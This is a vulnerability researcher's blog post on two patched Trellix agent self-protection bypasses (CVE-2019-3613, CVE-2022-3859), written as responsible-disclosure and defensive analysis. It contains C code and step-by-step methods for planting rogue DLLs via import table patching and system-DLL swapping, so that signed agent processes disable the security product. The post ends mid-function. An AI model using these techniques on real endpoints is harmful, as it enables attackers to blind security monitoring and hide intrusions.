Introduction to Trellix CVE-2022-3859

On 29th November, Trellix (formerly McAfee) released a security bulletin addressing an issue tracked as CVE-2022-3859 (https://kcm.trellix.com/corporate/index?page=content&id=SB10391), which I had discovered and responsibly disclosed a couple of months earlier. Its discovery was prompted by an earlier finding of mine of the same nature, affecting the same product, three years before (CVE-2019-3613, https://kcm.trellix.com/corporate/index?page=content&id=SB10320).

Since the official descriptions are rather general and cryptic, and both issues have since been addressed, I thought that sharing some of the technical details could be valuable for other techies who are interested in things like security solutions, system programming or ideas for attacking software self-protection mechanisms.

Self-protection mechanisms

As early detection of malicious activity is critical to stopping incidents in their early stages, enterprise security solutions such as Anti-Virus agents and EDR sensors have for some time been equipped with additional self-protection mechanisms. Those mechanisms are built on top of the security controls already provided by the operating system and try to extend them by introducing an additional security boundary, whereby even users with local admin privileges cannot stop the product from working on the endpoint, whether by disabling, tampering with, removing, or misconfiguring it.

This measure is taken both to prevent rogue users with administrative privileges from deliberately concealing their activity from the reach of such a security product, and to stop intruders and malware abusing high-privileged accounts.

Since this task attempts to attain something against the design of the operating system – which is preventing an administrator from performing an administrative operation – it is quite difficult to achieve. Having local admin/SYSTEM privileges provides a myriad of ways to influence the system in such a way that a particular process stops functioning as designed, and all that it takes for an attacker to succeed is to find just one that has not been predicted by the vendor – or implemented with some flaw.

Attack methodology

I decided to write this blog post only to share the approach I took while trying to bypass Trellix Agent’s self-protection, along with proofs of concept. Before we dive into those, please keep in mind that, with administrative privileges on the box, there are multiple methods one can try to render a security product useless, such as uninstalling the product, disabling the service, tampering with its resources (files, processes, memory, network connections, file descriptors, registry entries as well as other system objects), effectively blocking its network communication (name resolution tampering, firewall, routing), or breaking some of its local software/resource dependencies. This post is not, in any capacity, an attempt at creating a general methodology for breaking a security product, so I am not going to elaborate much on most of these attack avenues. For reference, though, I recommend the following two recent write-ups by other authors:

https://vovohelo.medium.com/bypassing-defenders-self-protect-mechanism-3b860301fb07

https://www.modzero.com/advisories/MZ-22-02-CrowdStrike-FalconSensor.txt

Trellix agent self-protection

Every decent security solution agent consists of components working in both user mode and kernel mode. Whereas the presence of user-mode components is dictated by practical reasons, such as the ability to easily call convenient WinAPI functions to perform basic operations, the presence of a kernel module (implemented and deployed as a kernel-mode filter driver) is required for at least the following reasons:

- being able to set up hooks in kernel mode, so even operations that bypass user-mode hooks can be seen (reliable detection),

- being able to block selected operations at the kernel level, including situations when such operations would be otherwise allowed in accordance with the current system setup, effective privileges of the requestor and the effective permissions set on the subject (reliable self-protection from malicious admin users).

Since Trellix (earlier McAfee) agent is the solution I personally have got the most experience with, I am using it as an example, however keep in mind that this design is universal among vendors.

Explaining the general concept with Trellix as an example does not require a great level of detail, like the full list of files and registry entries the product consists of (that information is crucial once we are trying to discover a bypass, but in that case we already have access to an instance of the product), so I am going to limit such details to the bare minimum here.

The user-mode components (executables, DLLs) are deployed into two subdirectories of %ProgramFiles%, named McAfee and Common Files\McAfee, respectively (C:\Program Files\McAfee\ and C:\Program Files\Common Files\McAfee\ on most systems).

Additionally, there are several subkeys in the HKLM\SYSTEM\CurrentControlSet\Services\ registry branch, responsible for instructing Windows to start the user-mode services (such as C:\Program Files\McAfee\Agent\masvc.exe) as well as to load the relevant kernel modules (files with the “.sys” extension deployed in the %SystemRoot%\system32\drivers directory). At least one of those drivers is responsible for the self-protection mechanism, and if we moved or removed it, say by interfering with the filesystem while our main operating system is not active (booting a different operating system and just mounting the system drive for writing), the system would then crash at boot.

Just like any other software product installed for all users, all of its resources, such as files and registry entries, have their permissions set in a secure manner, meaning that regular users can only read and execute them, whereas no form of change (writes, creations, removals, attribute changes) is granted to regular users, as presented in the screenshot below:

Types of accesses granted to local administrators and SYSTEM in the Windows ACL

As we can see, according to the Windows ACL, local administrators and SYSTEM have been granted full control over the directory (and its subdirectories and files).

Despite that, as demonstrated in the screenshot below, being an administrator does not allow us to write into those directories:

Administrators being unable to write into the directories

So, even though the operation would normally be allowed by the Windows Security Reference Monitor, it eventually gets blocked by a filter driver that is part of the product installation. We could find more details on that call by inspecting its stack trace with Procmon. We can also, by the way, list all filter drivers present in our system by issuing the “fltmc filters” command as administrator. Anyway, these are out of the scope of what I intended to share in this post.
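The write test from the screenshots can also be scripted. The following C sketch (probe_write and the probe file name are illustrative, not part of the original PoC) tries to create and then delete a file in a given directory and returns the errno reported by fopen() on failure. Assuming the Microsoft C runtime maps a denied create to EACCES, an administrator running it against C:/Program Files/McAfee/Agent while self-protection is active should get a non-zero result, even though the ACL grants full control.

```c
#include <errno.h>
#include <stdio.h>

/* Tries to create, then delete, dir/probe_name.
 * Returns 0 on success, or the errno reported by fopen() on failure. */
int probe_write(const char *dir, const char *probe_name)
{
    char path[1024];
    int n = snprintf(path, sizeof path, "%s/%s", dir, probe_name);
    if (n < 0 || (size_t)n >= sizeof path)
        return ENAMETOOLONG;

    errno = 0;
    FILE *f = fopen(path, "w");
    if (f == NULL)
        return errno != 0 ? errno : -1;  /* assumed EACCES when a filter driver denies it */

    fputs("probe\n", f);
    fclose(f);
    remove(path);                        /* leave nothing behind on success */
    return 0;
}
```

For example, probe_write("C:/Program Files/McAfee/Agent", "probe.txt") run as administrator would be expected to fail while the driver is active, whereas the same call against an unprotected directory returns 0.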

So, we know that any operations affecting the integrity of files, processes, registry entries (and, presumably, other resources) belonging to Trellix are blocked by the self-protection mechanism, even if attempted by otherwise-privileged users. However, there is still a need to change files, permissions, registry entries and the like, especially when the product receives a signature or code update. This suggests that the self-protection mechanism has some sort of built-in exception list, allowing such operations if they originate from processes belonging to the product. It follows that we could bypass the mechanism by injecting our own code into one of those processes. But the integrity of those processes, and of the executables they are spawned from, is protected by the self-protection mechanism, or at least it is supposed to be. The question that arises is whether the vendor anticipated all the code injection scenarios we as attackers can come up with and, if so, whether they implemented the prevention of those scenarios correctly.
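To make the exception-list idea concrete, here is a minimal C sketch of a path-based allow check. It is purely hypothetical: the real driver's logic and list are not public, and the two roots below are simply the installation directories named earlier. Note that any code running inside a process that passes such a check inherits its trust, which is exactly why code injection is the interesting question.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical trusted installation roots (the real list is not public). */
static const char *const TRUSTED_ROOTS[] = {
    "C:\\Program Files\\McAfee\\",
    "C:\\Program Files\\Common Files\\McAfee\\",
};

/* Case-insensitive prefix test, since Windows paths are case-insensitive. */
static bool has_prefix_ci(const char *s, const char *prefix)
{
    for (; *prefix != '\0'; ++s, ++prefix) {
        if (*s == '\0' ||
            tolower((unsigned char)*s) != tolower((unsigned char)*prefix))
            return false;
    }
    return true;
}

/* True if a request coming from a process whose image lives at image_path
 * would be exempted from the self-protection deny rule in this model. */
bool is_trusted_origin(const char *image_path)
{
    for (size_t i = 0; i < sizeof TRUSTED_ROOTS / sizeof TRUSTED_ROOTS[0]; ++i)
        if (has_prefix_ci(image_path, TRUSTED_ROOTS[i]))
            return true;
    return false;
}
```

Ending each root with a backslash matters: without it, a prefix test on C:\Program Files\McAfee would also accept C:\Program Files\McAfeeEvil\.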

CVE-2019-3613

Inspiration

In November 2019, McAfee released a security bulletin addressing CVE-2019-3648, discovered and documented by SafeBreach (https://www.safebreach.com/resources/mcafee-all-editions-mtp-avp-mis-self-defense-bypass-and-potential-usages-cve-2019-3648/). It boiled down to a DLL hijacking condition, whereby several system services, as well as the McAfee agent, looked for wbemcomn.dll in the C:\Windows\System32\wbem\ directory before trying to load it from C:\Windows\System32\ (where it was actually located). Thus, a malicious process running with administrator/SYSTEM privileges could place an arbitrary DLL file at C:\Windows\System32\wbem\wbemcomn.dll and get it loaded into multiple processes, including the McAfee agent. Since this scenario allowed execution of arbitrary code from within the McAfee agent process, it also allowed a self-protection bypass: that process, spawned from the correct installation path and correctly digitally signed, was on the exception list of the self-protection mechanism. It could therefore, for example, change the registry entries responsible for starting McAfee services at system boot, or modify executable files in such a way that the product would effectively stop working.
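The hijack comes down to the loader taking the first match in its search order. The sketch below is a deliberately simplified model in C (the real Windows search order also involves KnownDLLs, the application directory, SafeDllSearchMode and more): resolve_dll, a hypothetical helper, returns the index of the first directory that contains the requested file, or -1.

```c
#include <stddef.h>
#include <stdio.h>

static int file_exists(const char *path)
{
    FILE *f = fopen(path, "rb");
    if (f == NULL)
        return 0;
    fclose(f);
    return 1;
}

/* Simplified search-order model: the first directory containing `dll` wins.
 * Writes the resolved path into `out` and returns the directory index,
 * or returns -1 if no directory contains the file. */
int resolve_dll(const char *const dirs[], size_t ndirs, const char *dll,
                char *out, size_t outsz)
{
    for (size_t i = 0; i < ndirs; ++i) {
        int n = snprintf(out, outsz, "%s/%s", dirs[i], dll);
        if (n < 0 || (size_t)n >= outsz)
            continue;                  /* path does not fit: skip this dir */
        if (file_exists(out))
            return (int)i;
    }
    return -1;
}
```

With dirs set to {"C:/Windows/System32/wbem", "C:/Windows/System32"}, a wbemcomn.dll planted in the first directory would shadow the genuine one in the second, which is the condition SafeBreach described.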

This made me realize that such bypass would not even require a DLL hijacking condition. Since having administrative privileges is fair game when challenging self-protection mechanisms, we do not really need to discover a situation in which our target application attempts to load a non-existent DLL before looking for it in its correct deployment path. We could just as well modify one of the existing system DLLs in its original location – and that is exactly what I did.

Proof of concept

In most cases, regardless of whether we are hijacking the DLL search order by placing our own file in a location where the legitimate file does not exist, so that it gets loaded instead (the usual DLL hijacking scenario, like the one discovered and exploited by SafeBreach), or we are replacing an existing, legitimate DLL in its original path with our own, we should implement a technique called DLL proxying. It basically means that our DLL file with our arbitrary code, the one that gets loaded first, has the exact same set of Export Table entries (exported functions) as the original and can be used without impairing any functionality. The arbitrary code is put into the DllMain function, whereas all the exports are just forwarded to the original DLL file. This way, no functionality is broken. A good explanation and proof of concept of how this works can be found here: https://www.citadel.co.il/Home/Blog/1015.
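One common way to build such a proxy with MSVC is to emit one linker forwarding directive per export, of the form /export:Name=module.Name. The C sketch below generates those lines from a list of export names. The export list itself would come from the original DLL (for example via dumpbin /exports), the target module name cryptnet_orig is a hypothetical name for a renamed copy of the original, and ordinal-only exports are not handled.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Formats one MSVC forwarding directive for export `name`, pointing at the
 * same export in `target_module` (module name without ".dll").
 * Returns the snprintf() result, or -1 for names that would break the line. */
int format_forwarder(char *out, size_t outsz, const char *name,
                     const char *target_module)
{
    if (strchr(name, '"') != NULL || strchr(target_module, '"') != NULL)
        return -1;
    return snprintf(out, outsz,
                    "#pragma comment(linker, \"/export:%s=%s.%s\")",
                    name, target_module, name);
}

/* Prints a forwarder for every export name, ready to paste into the
 * proxy DLL's source next to its DllMain. */
void print_forwarders(const char *const names[], size_t n,
                      const char *target_module)
{
    char line[512];
    for (size_t i = 0; i < n; ++i) {
        int len = format_forwarder(line, sizeof line, names[i], target_module);
        if (len > 0 && (size_t)len < sizeof line)
            puts(line);
    }
}
```

For instance, print_forwarders((const char *const[]){"CryptGetObjectUrl"}, 1, "cryptnet_orig") prints a single #pragma line; the loader then resolves calls to that export straight to the original implementation.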

Back in December 2019, I came up with a way less elegant technique, which I referred to as Import Table Hijacking. It boils down to finding a suitable Import Table entry in a legitimate DLL and modifying it with a hex editor, so that it tells the Windows loader to search for a different DLL file (with our arbitrary code), which we deploy in the same directory as the legitimate DLL we modified. This way, our “proxy DLL” stays almost exactly the same in terms of size and contents, differing from the original by only one or two bytes. I described this in detail on my private blog here: https://hackingiscool.pl/pe-import-table-hijacking-as-a-way-of-achieving-persistence-or-exploiting-dll-side-loading/.



Looking for a hijack candidate, I checked the list of dynamic libraries loaded by user-space McAfee components upon system startup. Eventually – just like in the example on my private blog linked above, I picked cryptnet.dll, in this case its 32-bit version loaded by macompatsvc.exe from C:\Windows\SysWOW64\cryptnet.dll:

List of dynamic libraries loaded by user-space McAfee components upon system startup

I decided to hijack the api-ms-win-core-debug-l1-1-0.dll -> OutputDebugStringA entry, assuming that it would never get called under normal circumstances (but even if so, the function is only intended to output a string for debugging purposes, so breaking it should not be a functional issue):

Modifying the DLL name and function name of an Import Table entry in the 32-bit cryptnet.dll

The DLL could still be properly proxied, but I did not bother (as I mentioned before, this is a way less elegant solution than proper proxying). I took the original file and, using a hex editor, modified two bytes of that entry by changing one character in the DLL name and one in the function name, replacing “p” with “m” and “D” with “F”:

Replacing “p” with “m” in the DLL name in the 32-bit cryptnet.dll

Replacing “D” with “F” in the function name in the 32-bit cryptnet.dll

After saving, the change was reflected in the Import Table, just as intended:

The modified Import Table entry (DLL name and function name) in the 32-bit cryptnet.dll

So, from now on, the 32-bit version of cryptnet.dll, whenever loaded into a process, would instruct the Windows loader to load another DLL, named ami-ms-win-core-debug-l1-1-0.dll: our own malicious/test DLL.
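The hex-editor step can also be done programmatically. This C sketch, built around the hypothetical helper patch_same_length, replaces the first NUL-terminated occurrence of a string in a file image with another string of the same length, which is what keeps every offset and size in the PE file intact. It does not parse the PE format, so it assumes the target string occurs only where intended; and any such edit invalidates the file's Authenticode signature.

```c
#include <stddef.h>
#include <string.h>

/* Overwrites the first NUL-terminated occurrence of `from` in buf with `to`.
 * `to` must have the same length, so no RVA, offset or size in the PE file
 * changes. Returns the patched offset, or -1 if nothing was patched. */
long patch_same_length(unsigned char *buf, size_t len, const char *from,
                       const char *to)
{
    size_t n = strlen(from);
    if (n == 0 || strlen(to) != n || len < n + 1)
        return -1;
    for (size_t i = 0; i + n < len; ++i) {
        /* Require the terminating NUL so "a.dll" does not match "a.dll2". */
        if (memcmp(buf + i, from, n) == 0 && buf[i + n] == '\0') {
            memcpy(buf + i, to, n);
            return (long)i;
        }
    }
    return -1;
}
```

Applied to a buffer holding cryptnet.dll, the two calls would use the pairs ("api-ms-win-core-debug-l1-1-0.dll", "ami-ms-win-core-debug-l1-1-0.dll") and ("OutputDebugStringA", "OutputFebugStringA"); the same helper could also rename an export string in the rogue DLL after linking.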

Changing the function name was not necessary, but it made it easy to avoid a naming conflict with the original OutputDebugStringA function while building (compiling and linking) the rogue DLL. In hindsight, it would have been better to compile and link with the name changed (e.g. OutputFebugStringA), then edit the corresponding Export Table entry of ami-ms-win-core-debug-l1-1-0.dll after linking (changing OutputFebugStringA back to OutputDebugStringA) so that it matched the original name in the Import Table entry of cryptnet.dll, and to change only one character in cryptnet.dll, so that it would search for ami-ms-win-core-debug-l1-1-0.dll instead of api-ms-win-core-debug-l1-1-0.dll.

When it comes to the demo code, let’s stick to the scenario of disabling McAfee services from starting at boot, an action that could not be achieved using regedit, even as an administrator (because of the self-protection):

McAfee antivirus self-protection preventing administrator from using regedit (Registry Editor)

Below is the code for ami-ms-core-debug-l1-1-0.dll. It is just a demonstration of a single action that was otherwise blocked by the filter driver (the full original PoC changed all relevant service keys – redacted here):

Code of the demonstrative DLL intended for loading into target processes
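Since the original code is only shown as a screenshot, here is a hedged C reconstruction of the idea rather than the author's code: on DLL_PROCESS_ATTACH it sets the Start value of a service key under HKLM\SYSTEM\CurrentControlSet\Services to 4 (SERVICE_DISABLED). The service name masvc is an assumption based on the executable name, the stub OutputFebugStringA is exported only to satisfy the patched import, and the Windows-only part assumes MSVC. Only service_key_path is portable.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* "Start" value meaning SERVICE_DISABLED: the SCM will not start it. */
#define START_DISABLED 4u

/* Builds "SYSTEM\CurrentControlSet\Services\<name>" (relative to HKLM).
 * Returns the path length, or -1 if the name is invalid or too long. */
int service_key_path(char *out, size_t outsz, const char *service_name)
{
    if (service_name[0] == '\0' || strchr(service_name, '\\') != NULL)
        return -1;                        /* must be a single key name */
    int n = snprintf(out, outsz, "SYSTEM\\CurrentControlSet\\Services\\%s",
                     service_name);
    return (n < 0 || (size_t)n >= outsz) ? -1 : n;
}

#ifdef _WIN32
#include <windows.h>

/* Sets Start = 4 on one service key; returns a Win32 error code. */
static LONG disable_service(const char *service_name)
{
    char path[256];
    HKEY key;
    DWORD start = START_DISABLED;
    LONG rc;

    if (service_key_path(path, sizeof path, service_name) < 0)
        return ERROR_INVALID_PARAMETER;
    rc = RegOpenKeyExA(HKEY_LOCAL_MACHINE, path, 0, KEY_SET_VALUE, &key);
    if (rc != ERROR_SUCCESS)
        return rc;
    rc = RegSetValueExA(key, "Start", 0, REG_DWORD, (const BYTE *)&start,
                        (DWORD)sizeof start);
    RegCloseKey(key);
    return rc;
}

BOOL WINAPI DllMain(HINSTANCE inst, DWORD reason, LPVOID reserved)
{
    (void)inst;
    (void)reserved;
    /* Done directly in DllMain for brevity, as in the post's PoC; Microsoft's
     * DllMain guidance discourages calling into other DLLs here. */
    if (reason == DLL_PROCESS_ATTACH)
        disable_service("masvc");         /* hypothetical service name */
    return TRUE;
}

/* Satisfies the patched import; never expected to be called. The MSVC
 * pragmas give the stdcall function an undecorated export name. */
void WINAPI OutputFebugStringA(LPCSTR s) { (void)s; }
#if defined(_M_IX86)
#pragma comment(linker, "/export:OutputFebugStringA=_OutputFebugStringA@4")
#else
#pragma comment(linker, "/export:OutputFebugStringA")
#endif
#endif /* _WIN32 */
```

The post's full PoC changed all relevant service keys; calling disable_service once per key would be the straightforward extension.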

One more thing: when replacing system DLLs like C:\Windows\SysWOW64\cryptnet.dll, in most cases we will not be able to simply overwrite them, as they will be in use by at least one process. To get around this, we can rename them (which is possible while they are in use; existing open file handles are unaffected) and then put our own versions in their place. And remember, replacing original system DLLs is not an elegant solution and is likely to break things, especially programs that rely on the DLL while enforcing proper digital signatures before loading it. If we resort to this, we should restore the original file as soon as we have achieved our goal, to reduce the likelihood of breaking things or getting our activity noticed.
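The rename-then-replace step, and the later restore, can be sketched in portable C with rename() and a plain file copy. The helper names swap_in and restore are hypothetical; taking ownership of the file and adjusting its ACL first (needed for files owned by TrustedInstaller) is not shown. On Windows, rename() does not overwrite an existing file, so the backup name must be unused.

```c
#include <stdio.h>

/* Copies src to dst; returns 0 on success, -1 on any error. */
static int copy_file(const char *src, const char *dst)
{
    FILE *in = fopen(src, "rb");
    if (in == NULL)
        return -1;
    FILE *out = fopen(dst, "wb");
    if (out == NULL) {
        fclose(in);
        return -1;
    }
    char buf[4096];
    size_t n;
    int rc = 0;
    while ((n = fread(buf, 1, sizeof buf, in)) > 0)
        if (fwrite(buf, 1, n, out) != n) { rc = -1; break; }
    if (ferror(in))
        rc = -1;
    fclose(in);
    if (fclose(out) != 0)
        rc = -1;
    return rc;
}

/* Moves the (possibly in-use) original aside, then puts the replacement
 * at the original path. Rolls back if the copy fails. */
int swap_in(const char *target, const char *backup, const char *replacement)
{
    if (rename(target, backup) != 0)
        return -1;
    if (copy_file(replacement, target) != 0) {
        remove(target);               /* drop any partial copy */
        rename(backup, target);       /* and put the original back */
        return -1;
    }
    return 0;
}

/* Restores the original once the planted copy is no longer loaded. */
int restore(const char *target, const char *backup)
{
    if (remove(target) != 0)
        return -1;
    return rename(backup, target) == 0 ? 0 : -1;
}
```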

Now, back to the PoC – the result after reboot:

Results after reboot with the modified 32-bit cryptnet.dll

Confirmation check with regedit:

Confirmation that McAfee services were disabled from starting at boot

I reported the details to McAfee, which eventually resulted in CVE-2019-3613.

Conclusions on CVE-2019-3613

When protecting code integrity, the entire dependency chain must be taken care of. Therefore, if a self-protection mechanism prevents processes other than the product itself from introducing changes into its code, the integrity of system dependencies loaded from outside the protected directory (like C:\Program Files\McAfee) must be verified before use. If an integrity breach is detected, the important design decision is what to prioritize: availability or integrity. Once such a security product detects that an executable file fails its signature verification, it could either use it anyway (choosing availability over integrity protection) or force the system to crash. In either case, the event and its cause should be reported to increase the odds of detecting security incidents.
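The availability-versus-integrity choice can be captured in a small decision helper. This C sketch is hypothetical (the enums and the event format are invented for illustration), and "halt" stands in for whatever fail-closed action a product would take, such as refusing to start or crashing the system. Either way, a failed check is reported.

```c
#include <stdio.h>

typedef enum { VERIFY_OK, VERIFY_BAD_SIGNATURE, VERIFY_UNSIGNED } verify_result;
typedef enum { POLICY_FAIL_OPEN, POLICY_FAIL_CLOSED } integrity_policy;
typedef enum { ACTION_LOAD, ACTION_LOAD_AND_REPORT, ACTION_HALT_AND_REPORT } load_action;

/* Fail open favours availability; fail closed favours integrity. */
load_action decide(verify_result r, integrity_policy p)
{
    if (r == VERIFY_OK)
        return ACTION_LOAD;
    return p == POLICY_FAIL_OPEN ? ACTION_LOAD_AND_REPORT : ACTION_HALT_AND_REPORT;
}

/* Decides and, on any failure, writes an event line regardless of policy. */
load_action handle_dependency(const char *path, verify_result r,
                              integrity_policy p, FILE *event_log)
{
    load_action a = decide(r, p);
    if (a != ACTION_LOAD && event_log != NULL)
        fprintf(event_log, "integrity check failed: %s (result %d, action %d)\n",
                path, (int)r, (int)a);
    return a;
}
```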

An alternative is for the product to distribute its own copies of those DLLs and store them in its protected directory. In that case, the security solution vendor (here, Trellix) would also have to take care of any updates to those DLLs as they are issued by their original vendor (here, Microsoft).

CVE-2022-3859

So, in 2022 I decided to try my luck again, testing if I could find another way to bypass the self-protection mechanism after the vendor addressed my earlier submission.

Trying the same trick as before

First, let’s see what happens when we try to reproduce CVE-2019-3613 by messing with cryptnet.dll just like before and rebooting the system:

Error message when trying to apply the same moves to the product after addressing CVE-2019-3613

Ouch. So, it looks like the product verifies the digital signatures of the C:\Windows\System32 and C:\Windows\SysWOW64 DLLs it uses, at least at boot.

Looking for workarounds

OK, so this made me wonder about other possibilities while sticking to the same approach: abusing an original, digitally signed executable that is part of the targeted product, by tricking it into loading an illegitimate DLL with my own code.

Since I could not smuggle malicious DLLs upon system boot anymore – or at least not the same one I did before (I have not tested all of them, as a matter of fact I have only tested two), I started thinking about other scenarios.

Obviously, I could not write my own DLLs into the protected C:\Program Files\McAfee, C:\Program Files\Common Files\McAfee directories and their subdirectories either.

An evil twin

Knowing that the product consists of multiple executables running as services (plus several kernel modules), and seeing in the Procmon output that DLLs from both C:\Windows and C:\Program Files\McAfee were still being used, I thought: “hey, let’s abuse a copy of the product that we create in a different directory, one we control because it is not protected by the driver. The executables will still be digitally signed, so maybe we can trick one of them into loading our own DLL from there, since that will be its own directory, and also trick the driver into allowing change operations originating from the process we manually start from that copy”.

As I mentioned before, the product contains multiple executables, many of which are started as services upon system boot. Most of them run as SYSTEM.

So, I created my own copy of the installation folder: C:\Program Filez\McAfee.

As expected, it was not covered by the self-protection mechanism, so I could freely tamper with its contents, for instance by putting my own DLLs into locations like C:\Program Filez\McAfee\Agent.

The idea was to modify a DLL originally loaded from C:\Program Files\McAfee\Agent, but under the copy location of C:\Program Filez\McAfee\Agent, and then manually run the corresponding copy (still legitimate and digitally signed) of an executable from that path, for example C:\Program Filez\McAfee\Agent\x86\UpdaterUI.exe – as SYSTEM.

I experimented like this with several executables. UpdaterUI.exe was the first one that allowed me to load my own unsigned DLL that way.

The screenshots below show the two main functions of the test PoC DLL I created for that purpose. This time I simply tried to create a text file in one of the protected directories, as opposed to making registry changes. Additionally, I created a separate text file at C:\poc.txt to confirm code execution as SYSTEM. Every time, the text file would be appended with the module name of the current process (the one that loaded the DLL), along with the current user name, just to be clear where we had injected and as whom:

Testing the PoC rogue DLL – first part

Testing the PoC rogue DLL – second part

And here’s the main function:

Main function of the PoC DLL created – third part
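A C sketch of the logging part follows. It approximates what the screenshots show and is not the original source: append_poc_line is a hypothetical helper, and the Windows-only DllMain uses GetModuleFileNameA and GetUserNameA to record where the DLL was loaded and as whom, writing once to the unprotected C:\poc.txt and once into the protected agent directory (only the second write would prove a bypass).

```c
#include <stdio.h>

/* Appends "<module> | <user>" to log_path; returns 0 on success. */
int append_poc_line(const char *log_path, const char *module, const char *user)
{
    FILE *f = fopen(log_path, "a");
    if (f == NULL)
        return -1;                    /* e.g. creation denied by the driver */
    int ok = fprintf(f, "%s | %s\n", module, user) > 0;
    int closed = fclose(f) == 0;
    return (ok && closed) ? 0 : -1;
}

#ifdef _WIN32
#include <windows.h>

BOOL WINAPI DllMain(HINSTANCE inst, DWORD reason, LPVOID reserved)
{
    (void)inst;
    (void)reserved;
    if (reason == DLL_PROCESS_ATTACH) {
        char module[MAX_PATH] = "?";
        char user[256] = "?";
        DWORD user_len = (DWORD)sizeof user;

        GetModuleFileNameA(NULL, module, (DWORD)sizeof module); /* host .exe path */
        GetUserNameA(user, &user_len);                          /* needs advapi32 */
        append_poc_line("C:\\poc.txt", module, user);
        append_poc_line("C:\\Program Files\\McAfee\\Agent\\poc.txt", module, user);
    }
    return TRUE;
}
#endif
```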

This worked… Well, kind of. I was able to manually run C:\Program Filez\McAfee\Agent\x86\UpdaterUI.exe as SYSTEM (using an instance of cmd.exe spawned with Psexec) and make it load my unsigned DLL from C:\Program Filez\McAfee\Agent\x86\ (the name of which is irrelevant here) – and it did create C:\poc.txt, but it did NOT create C:\Program Files\McAfee\Agent\poc.txt – that operation had still been denied; therefore, it did NOT bypass the self-protection mechanism.

This meant that the self-protection mechanism did properly verify the module path of the process from which an operation on the protected directory originated.

That made me wonder whether I could somehow spoof the module name before the check was performed. The idea was to run C:\Program Filez\McAfee\Agent\x86\UpdaterUI.exe, trick it into loading our unsigned DLL from C:\Program Filez\McAfee\Agent\x86\, then change the module name of the process to C:\Program Files\McAfee\Agent\x86\UpdaterUI.exe, and only then attempt to write into the protected location C:\Program Files\McAfee\Agent\poc.txt.

Process module name spoofing – PEB and EPROCESS

When a process is created, there are two separate places where the path of the original executable is held. The first one is located in PEB (which resides in user-mode memory and we can overwrite it – which means we can spoof it). The second one is stored in the EPROCESS structure, which resides in kernel mode and thus we cannot change it from user-mode.
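The distinction can be illustrated with a toy model in C. The struct below is not a real Windows structure: it merely holds one path fixed at creation (standing in for the kernel's copy) and one writable path (standing in for the PEB data that, per this post, GetModuleFileNameA reads). Overwriting the user-mode copy changes what user-mode queries report, while a check that reads the kernel-side copy still sees the real location.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Toy model only, not actual EPROCESS/PEB layouts. */
typedef struct {
    const char *kernel_image_path;   /* fixed at process creation */
    char peb_image_path[260];        /* writable by code inside the process */
} toy_process;

/* What user-mode queries effectively report in this model. */
const char *user_mode_view(const toy_process *p)
{
    return p->peb_image_path;
}

/* The spoof: overwrite only the user-mode copy. */
void spoof_peb_path(toy_process *p, const char *fake)
{
    snprintf(p->peb_image_path, sizeof p->peb_image_path, "%s", fake);
}

/* A kernel-side check that reads the kernel's copy is unaffected. */
bool kernel_check_trusted(const toy_process *p, const char *trusted_prefix)
{
    return strncmp(p->kernel_image_path, trusted_prefix,
                   strlen(trusted_prefix)) == 0;
}
```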

After a quick search I came across a code snippet at https://unprotect.it/technique/change-module-name-at-runtime/. It was written for x64 processes, so I had to adapt it for x86 to fit the 32-bit UpdaterUI.exe I was targeting.

Below is the method I added into my PoC DLL:

Process module name spoofing method added in the PoC DLL created – first part

I also updated DllMain accordingly:

Updated DllMain in the PoC DLL created

The DLL compiled successfully, loaded into the rogue copy of UpdaterUI.exe, and created C:\poc.txt:

PoC DLL loaded into the rogue copy of UpdaterUI.exe

As we can see from the discrepancy between the two lines (log_module_name() was called twice; before and after spoofing the module name) – spoofing by overwriting the module name in PEB was successful – that is where GetModuleFileNameA() function takes the information from. I left the command line unchanged, although it could be spoofed the same way – by editing its copy in PEB.

But, in terms of bypassing the self-protection mechanism, that did not work either. It is possible that spoofing the command line as well to reflect the fake path would help, but I dismissed the idea at the time and concluded that the self-protection mechanism did properly verify the module name using the EPROCESS structure located in kernel memory, as opposed to the spoofable PEB structure. I probably would still try it if not for the fact that another idea crossed my mind.

Evil twin – the second approach

Since I already knew from my earlier observations that UpdaterUI.exe would load unsigned DLLs, and that it was not the first Trellix service spawned by the product at boot (which I knew from my earlier analysis of the boot log with Procmon), I thought: “Hey, why not temporarily replace C:\Windows\SysWOW64\cryptnet.dll with my own, then manually run another copy of UpdaterUI.exe as SYSTEM (from its original, protected directory), so it would load my DLL and run my code from within UpdaterUI.exe? Then I would restore the original system DLL to prevent Windows from crashing after reboot.”

So, using the same PoC DLL (the first version that created text files, without module name spoofing as it would not be needed in this scenario), I did it and it worked!

Step 1 – running cmd.exe as SYSTEM, using Psexec:

Running cmd.exe as SYSTEM, using Psexec

Step 2 – confirming the poc.txt file does not exist yet and that self-protection is working:

Confirming that poc.txt does not exist yet and that self-protection is working

Step 3 – deploying our rogue DLL (taking ownership from TrustedInstaller and then granting full control to SYSTEM beforehand was required):

Deploying our PoC rogue DLL

Step 4 – running the second instance of UpdaterUI.exe and confirming successful self-protection bypass:

Run of the second instance of UpdaterUI.exe and successful bypass of the self-protection of Trellix antivirus

Step 5 – finally, restoring the original DLL (the process died shortly after serving its purpose, so the DLL was not in use at the time and could be overwritten):

Restoration of the original DLL

In hindsight, this method is better than the previous one, as it does not require a system reboot to attain code execution within a signed Trellix process, and the time window during which the original system DLL is replaced with our own is limited, reducing the risk of interfering with other programs.

So, in this case the bypass resulted from the following conditions:

- Digital signatures of critical files were verified, but only during system boot, by the main service responsible for starting other components,

- At least one of the components did not verify the signatures, assuming that it was already done by the service that started it (which was the case when it was started at boot, but still – potential for a race condition exists here),

- It was not predicted that another instance of the given component could be run manually.

Combined, these conditions created a TOCTOU (Time Of Check to Time Of Use) race condition in the integrity verification mechanism.
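A toy C model of this TOCTOU condition follows. Comparing file contents with pinned bytes is only a stand-in for Authenticode verification, and all function names are hypothetical. boot_check verifies once; load_trusting, like the manually started component, reads whatever is on disk later; load_verifying checks the very bytes it is about to use, at the time of use.

```c
#include <stdio.h>
#include <string.h>

/* Reads up to cap bytes of path into buf; returns bytes read or -1. */
static long read_all(const char *path, unsigned char *buf, size_t cap)
{
    FILE *f = fopen(path, "rb");
    if (f == NULL)
        return -1;
    size_t n = fread(buf, 1, cap, f);
    fclose(f);
    return (long)n;
}

/* Stand-in for signature verification: exact match with pinned bytes. */
static int bytes_trusted(const unsigned char *buf, long n,
                         const unsigned char *pinned, size_t pinned_len)
{
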